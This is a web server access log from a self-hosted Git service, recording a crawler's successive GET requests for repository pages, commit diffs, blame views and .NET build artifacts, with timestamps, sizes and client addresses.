"/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" -[17/Feb/2026:14:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" -[17/Feb/2026:14:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts?display=source" [Client 74.7.227.38] [Length 11472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" -[17/Feb/2026:14:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" -[17/Feb/2026:14:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10840] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" -[17/Feb/2026:14:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10840] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" -[17/Feb/2026:14:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" -[17/Feb/2026:14:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" -[17/Feb/2026:14:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" -[17/Feb/2026:14:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" -[17/Feb/2026:14:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10464] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" -[17/Feb/2026:14:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" -[17/Feb/2026:14:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" -[17/Feb/2026:14:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" -[17/Feb/2026:14:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11304] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:14:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" -[17/Feb/2026:14:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" -[17/Feb/2026:14:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10842] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" -[17/Feb/2026:14:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 120385] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:14:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 120367] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:14:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 213776] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:14:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 212883] [Gzip 13.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:14:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 226082] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:14:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 9848] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11560] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11129] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10956] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11374] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11256] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11116] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:14:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 193763] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:14:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 18278] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:14:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 20156] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:14:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" -[17/Feb/2026:14:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:14:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10656] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:14:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9938] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:14:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 24365] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:14:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:14:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:14:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10037] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:14:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9917] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:14:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:14:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10033] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:14:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:14:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10257] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:14:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:14:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr 